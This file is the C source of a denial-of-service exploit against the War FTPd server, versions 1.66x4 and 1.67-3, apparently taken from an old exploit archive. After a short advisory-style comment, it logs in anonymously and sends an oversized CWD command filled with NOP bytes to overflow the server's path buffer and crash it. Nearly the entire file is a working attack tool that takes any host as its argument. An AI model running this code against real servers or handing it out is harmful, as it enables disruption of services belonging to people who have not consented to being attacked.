/* coded by eth0 from buffer0verfl0w */ /* tested by morpha */ /* *NOTE* Original exploit was coded for winbl0wz *NOTE */ /* Vulnerable: War FTPd version 1.66x4 War FTPd version 1.67-3 Immune: War FTPd version 1.67-4 War FTPd version 1.71-0 The buffer overflow seems to occur because the bound check of the command of MKD/CWD is imperfect. This means that although anyone can overflow the statically assigned buffer that stores the requested path, you cannot overwrite the RET address and therefore it's impossible to cause War FTPd to execute arbitrary code. However, it is a simple mechanism for performing a Denial of-Service against the server. Solution: War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities (see our additional information section). */ #include #include #include #include #include #include #include #include #include #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 #define PASS "PASS eth0@owns.your.ass.com\r\n" #define LOGIN "USER anonymous\r\n" int expl0it(char *host) { struct hostent *hp; struct in_addr addr; struct sockaddr_in s; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; /* u_char buf[280]; */ int p, i; hp = gethostbyname (host); if (!hp) exit (1); bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = 2, 1, IPPROTO_TCP); s.sin_port = htons (FTP_PORT); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); if(connect (p, &s, sizeof (s))!=0) { printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT); return; } else { printf("Connected!\n"); write(p, LOGIN, strlen(LOGIN)); write(p, PASS, strlen(PASS)); memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(p,(char *)packetbuf,strlen((char *)packetbuf),0); printf("DONE!\n"); } return(0); } int main(int argc, char *argv[]) { if(argc<2) { printf("Usage: %s [host] \n",argv[0]); return; } else { expl0it(argv[1]); } return(0); } /* www.hack.co.za [10 May 2000]*/